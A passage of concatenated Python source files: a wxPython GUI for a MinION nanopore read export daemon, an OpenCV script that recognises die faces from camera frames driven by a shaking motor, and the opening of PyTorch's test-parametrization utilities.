    in this file (remote copy fields exist in the UI but are unused)."""
    def __init__(self):
        pass
# MinION Export Deamon app
class app_core():
    """Headless core of the MinION export daemon: watches a source directory
    for matching files and archives them in batches via ``FileArchiver``.

    Fixes:
    * ``log=Log()`` was a shared mutable default argument (one logger for
      all instances); a fresh ``Log`` is now created per instance.
    * Bare ``except:`` in ``is_startable`` narrowed to ``except Exception``
      so KeyboardInterrupt/SystemExit are not swallowed.
    """

    def __init__(self, log=None):
        """
        :param log: optional object with an ``append(msg)`` method; a fresh
            ``Log`` is created when omitted.
        """
        self.source_path = ''
        self.export_path = ''
        self.batch_prefix = ''
        # run metadata (displayed/edited in the UI; not used by the watcher)
        self.cell_id = 'FXX00000'
        self.cell_type = 'FLO-MIN10X'
        self.kit = 'None'
        self.usr1 = ''
        self.usr2 = ''
        # ssh
        # options
        self.regex = '.*fast5$'
        self.batch_size = 4000
        self.batch_offset = 0
        self.delay = 60
        self.recursive = False
        self.ignore_existing = False
        self.watchdog = None
        self.file_queue = None
        self.archiver = None
        self.log = log if log is not None else Log()

    def is_startable(self):
        """Validate settings, log every problem, return True if startable."""
        startable = True
        try:
            if not os.path.isdir(self.source_path):
                startable = False
                self.log.append('[ERROR] Source is not a directory')
            if not os.path.isdir(self.export_path):
                startable = False
                self.log.append('[ERROR] Destination is not a directory')
            if self.batch_size < 1:
                startable = False
                self.log.append('[ERROR] Batch size must be greater one')
        except Exception:
            # e.g. non-string paths or a non-numeric batch size.
            return False
        return startable

    def start_watchdog(self):
        """Start the archiver and file-system observer; optionally queue
        files that already exist in the source directory."""
        try:
            self.archiver = FileArchiver(self.export_path, name_prefix=self.batch_prefix,
                                         batch_size=self.batch_size, count_offset=self.batch_offset,
                                         log=self.log)
            self.archiver.start()
            self.file_queue = TimedSet()
            self.watchdog = FileHandler(regex=[self.regex], notify=self.on_file_event)
            self.observer = Observer()
            self.observer.schedule(self.watchdog, path=self.source_path, recursive=self.recursive)
            self.observer.start()
            self.log.append('[INFO] Started File System Observer')
            if not self.ignore_existing:
                if self.recursive:
                    existing = [os.path.join(dirpath, f) for dirpath, _, files in os.walk(self.source_path) for f in files if re.match(self.regex, f)]
                else:
                    existing = [os.path.join(self.source_path, f) for f in os.listdir(self.source_path) if re.match(self.regex, f)]
                for ex in existing:
                    self.archiver.add(ex)
                self.log.append('[INFO] Included ' + str(len(existing)) + ' existing files')
            return True
        except Exception as e:
            self.log.append('[ERROR] Starting watchdog failed')
            return False

    def stop_watchdog(self):
        """Stop the observer, flush the delay queue into the archiver, stop it."""
        try:
            self.observer.stop()
            self.observer.join()
            # Flush everything still parked in the delay queue.
            for name in self.file_queue.get(t_wait=0):
                if os.path.isfile(name):
                    self.archiver.add(name)
            self.archiver.stop()
            self.log.append('[INFO] Stopped File System Observer')
            return True
        except Exception as e:
            self.log.append('[ERROR] Stoping Watchdog failed')
            return False

    def on_file_event(self, file_name):
        """File-system event callback: (re)stamp *file_name* and archive any
        files untouched for at least ``self.delay`` seconds."""
        self.file_queue.put(file_name)
        for name in self.file_queue.get(t_wait=self.delay):
            if os.path.isfile(name):
                self.archiver.add(name)
# Main Window
class app_window(wx.Frame):
    """Main window of the NanoSCP exporter.

    Fix: ``on_start_click`` stored the ``wx.TextCtrl`` widget itself in
    ``app.regex`` instead of its text (missing ``.GetValue()``), so the
    file-matching regex passed to ``re.match``/``FileHandler`` was a widget
    object and matching could never work.
    """

    def __init__(self, parent, title):
        # ensure the parent's __init__ is called
        super(app_window, self).__init__(parent, title=title, size=(520,560), style=wx.CAPTION | wx.MINIMIZE_BOX |
                                         wx.CLOSE_BOX | wx.RESIZE_BORDER | wx.CLIP_CHILDREN)
        # init app class
        self.log = Log()
        self.log.add_callback(self.on_log)
        self.app = app_core(log=self.log)
        # create a menu bar
        self.makeMenuBar()
        self.initUI()
        self.initEvents()
        self.Show()

    def makeMenuBar(self):
        """Create the File/Help menu bar and bind its handlers."""
        # Make a file menu with Hello and Exit items
        fileMenu = wx.Menu()
        # When using a stock ID we don't need to specify the menu item's label
        exitItem = fileMenu.Append(wx.ID_EXIT)
        # Now a help menu for the about item
        helpMenu = wx.Menu()
        aboutItem = helpMenu.Append(wx.ID_ABOUT)
        # Main menu bar
        menuBar = wx.MenuBar()
        menuBar.Append(fileMenu, "&File")
        menuBar.Append(helpMenu, "&Help")
        # Give the menu bar to the frame
        self.SetMenuBar(menuBar)
        # Bind event handler
        self.Bind(wx.EVT_MENU, self.on_exit, exitItem)
        self.Bind(wx.EVT_MENU, self.on_about, aboutItem)

    def initUI(self):
        """Build the form: file-system box, run box, options box, log, buttons."""
        panel = wx.Panel(self)
        sizer = wx.GridBagSizer(6, 5)
        # Destination settings
        dst_box = wx.StaticBox(panel, label="File System")
        dst_sizer = wx.StaticBoxSizer(dst_box, wx.VERTICAL)
        dst_grid = wx.GridBagSizer(3, 5)
        lbl_Source = wx.StaticText(panel, label="Source")
        self.txt_Source = wx.TextCtrl(panel)
        self.btn_Source = wx.Button(panel, label="Browse...", size=(-1, 20), )
        lbl_Destination = wx.StaticText(panel, label="Local/ Temp")
        self.txt_Destination = wx.TextCtrl(panel)
        self.btn_Destination = wx.Button(panel, label="Browse...", size=(-1, 20))
        lbl_ssh_key = wx.StaticText(panel, label="SCP Key")
        self.txt_ssh_key = wx.TextCtrl(panel)
        self.btn_ssh_key = wx.Button(panel, label="Browse...", size=(-1, 20))
        lbl_ssh_host = wx.StaticText(panel, label="SCP Host")
        self.txt_ssh_host = wx.TextCtrl(panel)
        lbl_username = wx.StaticText(panel, label="SCP User")
        self.txt_ssh_user = wx.TextCtrl(panel)
        lbl_password = wx.StaticText(panel, label="SCP Password")
        self.txt_ssh_pw = wx.TextCtrl(panel, style=wx.TE_PASSWORD)
        dst_grid.Add(lbl_Source, pos=(0,0), flag=wx.LEFT|wx.ALIGN_CENTER_VERTICAL, border=5)
        dst_grid.Add(self.txt_Source, pos=(0,1), span=(1, 3), flag=wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, border=5)
        dst_grid.Add(self.btn_Source, pos=(0,4), flag=wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, border=5)
        dst_grid.Add(lbl_Destination, pos=(1,0), flag=wx.LEFT|wx.ALIGN_CENTER_VERTICAL, border=5)
        dst_grid.Add(self.txt_Destination, pos=(1,1), span=(1, 3), flag=wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, border=5)
        dst_grid.Add(self.btn_Destination, pos=(1,4), flag=wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, border=5)
        dst_grid.Add(lbl_ssh_host, pos=(2,0), flag=wx.LEFT|wx.ALIGN_CENTER_VERTICAL, border=5)
        dst_grid.Add(self.txt_ssh_host, pos=(2,1), span=(1, 1), flag=wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, border=5)
        dst_grid.Add(lbl_ssh_key, pos=(2,2), flag=wx.LEFT|wx.ALIGN_CENTER_VERTICAL, border=5)
        dst_grid.Add(self.txt_ssh_key, pos=(2,3), span=(1, 1), flag=wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, border=5)
        dst_grid.Add(self.btn_ssh_key, pos=(2,4), flag=wx.RIGHT|wx.ALIGN_CENTER_VERTICAL, border=5)
        dst_grid.Add(lbl_username, pos=(3,0), flag=wx.LEFT|wx.ALIGN_CENTER_VERTICAL, border=5)
        dst_grid.Add(self.txt_ssh_user, pos=(3,1), span=(1,1), flag=wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, border=5)
        dst_grid.Add(lbl_password, pos=(3,2), flag=wx.LEFT|wx.ALIGN_CENTER_VERTICAL, border=5)
        dst_grid.Add(self.txt_ssh_pw, pos=(3,3), span=(1,1), flag=wx.EXPAND|wx.ALIGN_CENTER_VERTICAL, border=5)
        dst_grid.AddGrowableCol(1)
        dst_grid.AddGrowableCol(3)
        dst_sizer.Add(dst_grid, flag=wx.EXPAND)
        sizer.Add(dst_sizer, pos=(0, 0), span=(1, 5),
                  flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT , border=0)
        # Run params
        run_box = wx.StaticBox(panel, label="Run")
        run_sizer = wx.StaticBoxSizer(run_box, wx.VERTICAL)
        run_grid = wx.GridSizer(3, 4, 5, 5)
        lbl_cell_id = wx.StaticText(panel, label="Flo-Cell ID")
        self.txt_cell_id = wx.TextCtrl(panel, style=wx.TE_RIGHT, size=(80, -1), value=self.app.cell_id)
        lbl_cell_type = wx.StaticText(panel, label="Flo-Cell Type")
        self.txt_cell_type = wx.TextCtrl(panel, style=wx.TE_RIGHT, size=(80, -1), value=self.app.cell_type)
        lbl_kit = wx.StaticText(panel, label="Sequencing Kit")
        self.txt_kit = wx.TextCtrl(panel, style=wx.TE_RIGHT, size=(80, -1), value=self.app.kit)
        lbl_usr1 = wx.StaticText(panel, label="User Field 1")
        self.txt_usr1 = wx.TextCtrl(panel, style=wx.TE_RIGHT, size=(60, -1), value=self.app.usr1)
        lbl_usr2 = wx.StaticText(panel, label="User Field 2")
        self.txt_usr2 = wx.TextCtrl(panel, style=wx.TE_RIGHT, size=(60, -1), value=self.app.usr2)
        run_grid.Add(lbl_cell_id, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
        run_grid.Add(self.txt_cell_id)
        run_grid.Add(lbl_usr1, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
        run_grid.Add(self.txt_usr1)
        run_grid.Add(lbl_cell_type, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
        run_grid.Add(self.txt_cell_type)
        run_grid.Add(lbl_usr2, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
        run_grid.Add(self.txt_usr2)
        run_grid.Add(lbl_kit, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
        run_grid.Add(self.txt_kit)
        run_sizer.Add(run_grid, flag=wx.EXPAND)
        sizer.Add(run_sizer, pos=(1, 0), span=(1, 5),
                  flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT , border=0)
        # Options
        opt_box = wx.StaticBox(panel, label="Options")
        opt_sizer = wx.StaticBoxSizer(opt_box, wx.VERTICAL)
        opt_grid = wx.GridSizer(4, 4, 5, 5)
        self.chk_recursive = wx.CheckBox(panel, label="Recursive")
        self.chk_igexist = wx.CheckBox(panel, label="Ignore Existing")
        lbl_batch_size = wx.StaticText(panel, label="Batch size")
        lbl_batch_offset = wx.StaticText(panel, label="Batch offset")
        lbl_delay = wx.StaticText(panel, label="Delay")
        self.int_batch_size = intctrl.IntCtrl(panel, style=wx.TE_RIGHT, size=(80, -1), value=self.app.batch_size)
        self.int_batch_offset = intctrl.IntCtrl(panel, style=wx.TE_RIGHT, size=(60, -1), value=self.app.batch_offset)
        self.int_delay = intctrl.IntCtrl(panel, style=wx.TE_RIGHT, size=(80, -1), value=self.app.delay)
        lbl_file_regex = wx.StaticText(panel, label="File regex")
        lbl_batch_prefix = wx.StaticText(panel, label="Batch prefix")
        self.txt_file_regex = wx.TextCtrl(panel, style=wx.TE_RIGHT, size=(80, -1), value=self.app.regex)
        self.txt_batch_prefix = wx.TextCtrl(panel, style=wx.TE_RIGHT, size=(60, -1), value=self.app.batch_prefix)
        opt_grid.Add(self.chk_recursive, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
        opt_grid.Add(self.chk_igexist, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
        opt_grid.Add(wx.StaticText(panel))
        opt_grid.Add(wx.StaticText(panel))
        opt_grid.Add(lbl_batch_size, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
        opt_grid.Add(self.int_batch_size, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
        opt_grid.Add(lbl_batch_offset, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
        opt_grid.Add(self.int_batch_offset, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
        opt_grid.Add(lbl_file_regex, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
        opt_grid.Add(self.txt_file_regex, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
        opt_grid.Add(lbl_batch_prefix, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
        opt_grid.Add(self.txt_batch_prefix, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
        opt_grid.Add(lbl_delay, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
        opt_grid.Add(self.int_delay, flag=wx.ALIGN_CENTER_VERTICAL, border=5)
        opt_sizer.Add(opt_grid, flag=wx.EXPAND)
        sizer.Add(opt_sizer, pos=(2, 0), span=(1, 5),
                  flag=wx.EXPAND|wx.TOP|wx.LEFT|wx.RIGHT , border=0)
        # Log
        self.txt_log = wx.TextCtrl(panel, style=wx.TE_MULTILINE)
        self.txt_log.Disable()
        sizer.Add(self.txt_log, pos=(3,0), span=(1,5), flag=wx.EXPAND, border=5)
        # Flow Control
        self.btn_Start = wx.Button(panel, label="Start")
        sizer.Add(self.btn_Start, pos=(4, 3))
        self.btn_Stop = wx.Button(panel, label="Stop")
        self.btn_Stop.Disable()
        sizer.Add(self.btn_Stop, pos=(4, 4), span=(1, 1),
                  flag=wx.BOTTOM|wx.RIGHT, border=5)
        sizer.AddGrowableCol(2)
        sizer.AddGrowableRow(3)
        panel.SetSizer(sizer)
        self.panel = panel

    def initEvents(self):
        """Bind window-close and button events."""
        self.Bind(wx.EVT_CLOSE, self.on_exit)
        self.Bind(wx.EVT_BUTTON, self.on_source_browse, self.btn_Source)
        self.Bind(wx.EVT_BUTTON, self.on_destination_browse, self.btn_Destination)
        self.Bind(wx.EVT_BUTTON, self.on_key_browse, self.btn_ssh_key)
        self.Bind(wx.EVT_BUTTON, self.on_start_click, self.btn_Start)
        self.Bind(wx.EVT_BUTTON, self.on_stop_click, self.btn_Stop)

    def on_exit(self, event):
        # Best-effort stop of a possibly-running watchdog, then close.
        self.on_stop_click(None)
        self.Destroy()

    def on_about(self, event):
        wx.MessageBox("Export MinION reads in batches to remote location.",
                      "MinION Export Deamon",
                      wx.OK|wx.ICON_INFORMATION)

    def on_log(self, log):
        # Callback from the Log object; may fire from worker threads, hence
        # CallAfter to marshal UI updates onto the main thread.
        wx.CallAfter(self.txt_log.Enable)
        wx.CallAfter(self.txt_log.AppendText, log)
        wx.CallAfter(self.txt_log.AppendText, '\n')
        wx.CallAfter(self.txt_log.Disable)

    def on_source_browse(self, event):
        dlg = wx.DirDialog (None, "Choose source directory", "",
                            wx.DD_DEFAULT_STYLE | wx.DD_DIR_MUST_EXIST)
        if dlg.ShowModal() == wx.ID_OK:
            self.txt_Source.SetValue(dlg.GetPath())

    def on_destination_browse(self, event):
        dlg = wx.DirDialog (None, "Choose destination directory", "",
                            wx.DD_DEFAULT_STYLE | wx.DD_DIR_MUST_EXIST)
        if dlg.ShowModal() == wx.ID_OK:
            self.txt_Destination.SetValue(dlg.GetPath())

    def on_key_browse(self, event):
        dlg = wx.FileDialog (None, "Choose private key file",
                             style=wx.FD_OPEN | wx.FD_FILE_MUST_EXIST)
        if dlg.ShowModal() == wx.ID_OK:
            self.txt_ssh_key.SetValue(dlg.GetPath())

    def on_start_click(self, event):
        """Copy form values into the core and start the watchdog."""
        self.app.source_path = self.txt_Source.GetValue()
        self.app.export_path = self.txt_Destination.GetValue()
        self.app.recursive = self.chk_recursive.GetValue()
        self.app.ignore_existing = self.chk_igexist.GetValue()
        self.app.batch_size = self.int_batch_size.GetValue()
        self.app.batch_offset = self.int_batch_offset.GetValue()
        self.app.delay = self.int_delay.GetValue()
        # FIX: previously assigned the TextCtrl widget itself, not its text.
        self.app.regex = self.txt_file_regex.GetValue()
        self.app.batch_prefix = self.txt_batch_prefix.GetValue()
        if self.app.is_startable():
            if self.app.start_watchdog():
                # Freeze the form while running; only Stop stays enabled.
                for child in self.panel.GetChildren():
                    if hasattr(child, 'Disable'):
                        child.Disable()
                self.btn_Stop.Enable()

    def on_stop_click(self, event):
        """Stop the watchdog and re-enable the form."""
        if self.app.stop_watchdog():
            for child in self.panel.GetChildren():
                if hasattr(child, 'Enable'):
                    child.Enable()
            self.btn_Stop.Disable()
if __name__ == '__main__':
    # Create the wx application and main window, then enter the event loop.
    app = wx.App()
    app_main = app_window(None, title='NanoSCP')
    app.MainLoop()
    # NOTE(review): exit() after MainLoop is redundant (the script ends
    # anyway); kept as-is since doc-only change.
    exit()
|
detect.py
|
import cv2
import numpy as np
import subprocess
import threading
import time
import image
import motor
# Number of die faces; reference images are expected as 1.jpg .. 6.jpg.
sides=6
def match_img(flann, scene, needle):
    """FLANN-match *needle* into *scene*; with >= 9 good matches, estimate a
    homography and outline the projected needle quad on the scene image.

    Returns ``(found, homography, drawn_image, inlier_mask, good_matches)``.
    On failure the homography and mask are None and the scene image is
    returned unmodified.
    """
    matches = flann.knnMatch(needle.descriptors,scene.descriptors,k=2)
    good = []
    # Lowe's ratio test: keep matches clearly better than their runner-up.
    for m,n in matches:
        if m.distance < 0.7*n.distance:
            good.append(m)
    if len(good) >= 9:
        src_pts = np.float32([ needle.keypoints[m.queryIdx].pt for m in good ]).reshape(-1,1,2)
        dst_pts = np.float32([ scene.keypoints[m.trainIdx].pt for m in good ]).reshape(-1,1,2)
        M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)
        matches_mask = mask.ravel().tolist()
        h,w,depth = needle.img.shape
        # Needle corners, projected into scene coordinates.
        pts = np.float32([[0,0], [0,h-1], [w-1,h-1], [w-1,0]]).reshape(-1,1,2)
        dst = cv2.perspectiveTransform(pts, M)
        drawn = scene.img
        # NOTE(review): cv2.CV_AA exists only in OpenCV 2.x (modern builds
        # use cv2.LINE_AA); left unchanged to match the cv2.SIFT()-era API
        # used by the rest of this script.
        cv2.polylines(drawn, [np.int32(dst)], True, 255, 3, cv2.CV_AA)
        return (True, M, drawn, mask, good)
    else:
        return (False, None, scene.img, None, good)
def detect_side(dice, img):
    """Match *img* against every die-face reference and return the winning
    0-based face index plus the processed image; -1 when ambiguous.

    A face wins when it accounts for at least 2/3 of all good matches. On a
    win the reference image is pasted into the frame's top-left corner and
    the annotated frame is published to the display thread.
    """
    global disp_img
    global cv_display
    image.process(sift, img)
    num = [ 0 for i in range(sides) ]
    for i in range(sides):
        rv, M, img.img, mask, good = match_img(flann, img, dice[i])
        if rv:
            num[i] += len(good)
    ret = -1
    if sum(num) != 0:
        for n in range(sides):
            # Equivalent to num[n]/sum(num) >= 2/3 without float division.
            if num[n]*3 >= sum(num)*2:
                ret = n
                break
    if ret != -1:
        # Overlay the matched reference image for visual confirmation.
        img.img[0:dice[ret].img.shape[0],
                0:dice[ret].img.shape[1]] = dice[ret].img
        # Hand the annotated frame to display_thread.
        cv_display.acquire()
        disp_img = img.img
        cv_display.notify()
        cv_display.release()
    print(num)
    return ret, img
# Condition variables + flags coordinating the pipeline:
# shake -> grab -> process (main loop) -> display.
# Each do_* flag is the predicate associated with the matching cv_* condition.
cv_shake = threading.Condition()
cv_grab = threading.Condition()
cv_process = threading.Condition()
grabbed_image = None  # latest frame handed from grab_thread to the main loop
cv_display = threading.Condition()
disp_img = None  # latest annotated frame for display_thread (None = consumed)
do_shake = False
do_grab = False
do_process = False
running = True  # global shutdown flag; cleared when 'q' is pressed
def shake_thread():
    """Worker: on each shake signal, run the dice-shaking motor, then signal
    the grab worker to capture a frame."""
    print("Shake thread started")
    global do_shake
    global do_grab
    global running
    while running:
        cv_shake.acquire()
        # NOTE(review): `if` + wait() (rather than a `while`-predicate loop)
        # is vulnerable to spurious wakeups, BUT the main script's initial
        # kick notifies cv_shake without setting do_shake — it relies on
        # this exact behaviour, so it is documented instead of changed.
        if do_shake == False:
            cv_shake.wait()
        motor.shake()
        do_shake = False
        # Hand off to the grabber. Lock order is cv_shake -> cv_grab here,
        # while grab_thread nests cv_grab -> cv_shake — a potential
        # deadlock risk inherited from the original design.
        cv_grab.acquire()
        do_grab = True
        cv_grab.notify()
        cv_grab.release()
        cv_shake.release()
def grab_thread():
    """Worker: wait for the grab signal, capture a camera image, re-arm the
    shake worker, then hand the frame to the processing loop."""
    global grabbed_image
    global do_shake
    global do_grab
    global do_process
    global running
    print("Grab thread started")
    while running:
        cv_grab.acquire()
        # NOTE(review): same `if` + wait() pattern as shake_thread — prone
        # to spurious wakeups; kept for consistency with the existing
        # signalling scheme.
        if do_grab == False:
            cv_grab.wait()
        tmp = image.grab_image()
        do_grab = False
        # Re-arm the shaker while still holding cv_grab (reverse nesting
        # order vs. shake_thread — see deadlock note there).
        cv_shake.acquire()
        do_shake = True
        cv_shake.notify()
        cv_shake.release()
        # Publish the captured frame to the main processing loop.
        cv_process.acquire()
        do_process = True
        grabbed_image = tmp
        cv_process.notify()
        cv_process.release()
        cv_grab.release()
def display_thread():
    """Worker: show the most recent annotated frame and handle the quit key.

    Fix: compared numpy image arrays to None with ``==``/``!=``, which is an
    elementwise (ambiguous) comparison in modern numpy — replaced with
    identity checks (``is None`` / ``is not None``).
    """
    global cv_display
    global disp_img
    global running
    i = None
    # Wait (blocking) for the first frame so the window has content.
    while running and i is None:
        cv_display.acquire()
        cv_display.wait()
        if disp_img is not None:
            i = disp_img
            cv2.imshow('frame', i)
            disp_img = None
        cv_display.release()
    # Steady state: poll for new frames while servicing the GUI event loop.
    while running:
        cv_display.acquire()
        if disp_img is not None:
            i = disp_img
            cv2.imshow('frame', i)
            disp_img = None
        cv_display.release()
        # waitKey also pumps the HighGUI event loop; 'q' requests shutdown.
        key = cv2.waitKey(20) & 0xFF
        if key == ord('q'):
            running = False
# --- main script: build matchers, start worker threads, tally die rolls ---
cv2.namedWindow('frame', cv2.WINDOW_NORMAL)
sift = cv2.SIFT()
# One reference image per die face, named 1.jpg .. 6.jpg.
dice = [ image.open_image("%d.jpg" % (i,), i) for i in range(1, sides + 1) ]
[ image.process(sift, i) for i in dice ]
FLANN_INDEX_KDTREE = 0
index_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)
search_params = dict(checks = 50)
flann = cv2.FlannBasedMatcher(index_params, search_params)
motor.init("/dev/ttyUSB0", 9600)
threading.Thread(target = shake_thread).start()
threading.Thread(target = grab_thread).start()
threading.Thread(target = display_thread).start()
# Initial kick: notify the shake worker. NOTE(review): do_shake is NOT set
# here — this relies on shake_thread proceeding past wait() on the bare
# notification (see the note in shake_thread).
cv_shake.acquire()
cv_shake.notify()
cv_shake.release()
num = [0 for i in range(sides) ]
nums = []
added = 0
log = open('log', 'a')
# Main processing loop: consume grabbed frames, classify the visible side,
# append each recognized roll to the on-disk log and print a running
# percentage histogram.
while running:
    cv_process.acquire()
    print("Acquired process lock")
    if do_process == False:
        print("Wait for image")
        cv_process.wait()
    tmp = grabbed_image
    do_process = False
    print("Processing")
    n, img = detect_side(dice, tmp)
    cv_process.release()
    print("Released process lock\n")
    if n != -1:
        num[n] += 1
        log.write("%d\n" % (n, ))
        log.flush()
        added += 1
    else:
        # Keep the last unrecognized frame around for debugging.
        cv2.imwrite("failure.png", img.img)
    if added > 0:
        print(n, [int(n * 100. / added) for n in num])
|
common_utils.py
|
r"""Importing this file must **not** initialize CUDA context. test_distributed
relies on this assumption to properly run. This means that when this is imported
no CUDA calls shall be made, including torch.cuda.device_count(), etc.
torch.testing._internal.common_cuda.py can freely initialize CUDA context when imported.
"""
import sys
import os
import platform
import re
import gc
import types
import math
from functools import partial
import inspect
import io
import copy
import operator
import argparse
import unittest
import warnings
import random
import contextlib
import shutil
import threading
from pathlib import Path
import socket
import subprocess
import time
from collections import OrderedDict
from collections.abc import Sequence
from contextlib import contextmanager, closing
from functools import wraps
from itertools import product
from copy import deepcopy
from numbers import Number
import tempfile
import json
import __main__ # type: ignore[import]
import errno
import ctypes
from typing import cast, Any, Dict, Iterable, Iterator, Optional, Union, List
from unittest.mock import MagicMock
import numpy as np
import expecttest
from .._core import \
(_compare_tensors_internal, _compare_scalars_internal, _compare_return_type)
import torch
import torch.cuda
from torch.testing import make_tensor
from torch._utils_internal import get_writable_path
from torch._six import string_classes
from torch import Tensor
import torch.backends.cudnn
import torch.backends.mkl
from enum import Enum
from statistics import mean
import functools
# Freeze global backend flags — presumably so individual tests cannot leak
# flag changes; see torch.backends.disable_global_flags (TODO confirm intent).
torch.backends.disable_global_flags()
FILE_SCHEMA = "file://"
if sys.platform == 'win32':
    # Windows file URLs need three slashes before the drive letter.
    FILE_SCHEMA = "file:///"
# Environment variable `IN_CI` is set in `.jenkins/common.sh`.
IS_IN_CI = os.getenv('IN_CI') == '1'
IS_SANDCASTLE = os.getenv('SANDCASTLE') == '1' or os.getenv('TW_JOB_USER') == 'sandcastle'
IS_FBCODE = os.getenv('PYTORCH_TEST_FBCODE') == '1'
IS_REMOTE_GPU = os.getenv('PYTORCH_TEST_REMOTE_GPU') == '1'
# File names for JSON lists of disabled/slow tests (populated elsewhere;
# loaded lazily into the dicts below).
DISABLED_TESTS_FILE = '.pytorch-disabled-tests.json'
SLOW_TESTS_FILE = '.pytorch-slow-tests.json'
# Lazy caches of the above; None until loaded.
slow_tests_dict: Optional[Dict[str, Any]] = None
disabled_tests_dict: Optional[Dict[str, Any]] = None
class _TestParametrizer(object):
    """
    Decorator class for parametrizing a test function, yielding a set of new tests spawned
    from the original generic test, each specialized for a specific set of test inputs. For
    example, parametrizing a test across the set of ops will result in a test function per op.

    The decision of how to parametrize / what to parametrize over is intended to be implemented
    by each derived class.

    In the details, the decorator adds a 'parametrize_fn' property to the test function that is called
    during device-specific test instantiation performed in instantiate_device_type_tests(). Because of this,
    there is no need to parametrize over device type, as that is already handled separately.

    If the decorator is applied to a test function that already has a 'parametrize_fn' property, a new
    composite 'parametrize_fn' will be created that generates tests with the product of the parameters
    generated by the old and new parametrize_fns. This allows for convenient composability of decorators.

    Args:
        handles_dtypes (bool): If True, indicates that it is the responsibility of the decorator to handle
            dtypes internally. This allows for more flexibility when needed (e.g. for op-specific dtype
            handling). Default: True
    """
    def __init__(self, handles_dtypes=True):
        self.handles_dtypes = handles_dtypes

    def _parametrize_test(self, test, generic_cls, device_cls):
        """
        Parametrizes the given test function across whatever dimension is specified by the derived class.
        Tests can be parametrized over any arbitrary dimension or combination of dimensions, such as all
        ops, all modules, or all ops + their associated dtypes.

        Args:
            test (fn): Test function to parametrize over
            generic_cls (class): Generic test class object containing tests (e.g. TestFoo)
            device_cls (class): Device-specialized test class object (e.g. TestFooCPU); set to None
                if the tests are not part of a device-specific set

        Returns:
            Generator object returning 3-tuples of:
                test (fn): Parametrized test function; must support a device arg and args for any params
                test_name (str): Parametrized suffix for the test (e.g. opname_int64); will be appended to
                    the base name of the test
                param_kwargs (dict): Param kwargs to pass to the test (e.g. {'op': 'add', 'dtype': torch.int64})
        """
        raise NotImplementedError

    def __call__(self, fn):
        if hasattr(fn, 'parametrize_fn'):
            # Do composition with the product of args.
            old_parametrize_fn = fn.parametrize_fn
            new_parametrize_fn = self._parametrize_test
            # Both parametrize_fns are bound as default args so the generator
            # closure captures their current values, not later rebindings.
            def composite_fn(test, generic_cls, device_cls,
                             old_parametrize_fn=old_parametrize_fn,
                             new_parametrize_fn=new_parametrize_fn):
                # Materialize the old parametrization first, then expand each
                # resulting test with the new one (cartesian product).
                old_tests = [(test, test_name, param_kwargs) for (test, test_name, param_kwargs) in
                             old_parametrize_fn(test, generic_cls, device_cls)]
                for (old_test, old_test_name, old_param_kwargs) in old_tests:
                    for (new_test, new_test_name, new_param_kwargs) in \
                            new_parametrize_fn(old_test, generic_cls, device_cls):
                        # On key collisions, kwargs from the new parametrization win.
                        full_param_kwargs = {**old_param_kwargs, **new_param_kwargs}
                        # Note: the *new* suffix comes first in the composed name.
                        yield (new_test, '{}_{}'.format(new_test_name, old_test_name), full_param_kwargs)

            fn.parametrize_fn = composite_fn

            # At most one decorator in a composition may handle dtypes.
            old_handles_dtypes = fn.handles_dtypes if hasattr(fn, 'handles_dtypes') else False
            if self.handles_dtypes and old_handles_dtypes:
                raise RuntimeError('Cannot compose multiple parametrization decorators that handle dtypes; '
                                   'their dtype handling conflicts')

            fn.handles_dtypes = self.handles_dtypes or old_handles_dtypes
        else:
            fn.parametrize_fn = self._parametrize_test
            fn.handles_dtypes = self.handles_dtypes
        return fn
def instantiate_parametrized_tests(generic_cls):
    """
    Instantiates tests that have been decorated with a parametrize_fn. This is generally performed by a
    decorator subclass of _TestParametrizer. The generic test will be replaced on the test class by
    parametrized tests with specialized names.

    Args:
        generic_cls (class): Generic test class object containing tests (e.g. TestFoo)
    """
    for attr_name in tuple(dir(generic_cls)):
        class_attr = getattr(generic_cls, attr_name)
        if not hasattr(class_attr, 'parametrize_fn'):
            continue

        # Dtype-handling decorators require device-specific instantiation instead.
        if hasattr(class_attr, 'handles_dtypes') and class_attr.handles_dtypes:
            raise RuntimeError('instantiate_parametrized_tests() should not be used with decorators '
                               'that handle dtypes internally (e.g. @ops, @modules, etc.). Use '
                               'instantiate_device_type_tests() with these instead.')

        # Remove the generic test from the test class.
        delattr(generic_cls, attr_name)

        # Add parametrized tests to the test class.
        def instantiate_test_helper(cls, name, test, param_kwargs):
            # Helper exists to capture `name`/`test`/`param_kwargs` per call,
            # avoiding the late-binding-closure pitfall in the loop below.
            # Binding param_kwargs as a default arg freezes it for this test.
            @wraps(test)
            def instantiated_test(self, param_kwargs=param_kwargs):
                test(self, **param_kwargs)

            # NOTE(review): the `cls` parameter is accepted but `generic_cls`
            # from the enclosing scope is what is actually checked/mutated;
            # the only call site passes cls=generic_cls, so they coincide.
            assert not hasattr(generic_cls, name), "Redefinition of test {0}".format(name)
            setattr(generic_cls, name, instantiated_test)

        for (test, test_suffix, param_kwargs) in class_attr.parametrize_fn(
                class_attr, generic_cls=generic_cls, device_cls=None):
            full_name = '{}_{}'.format(test.__name__, test_suffix)
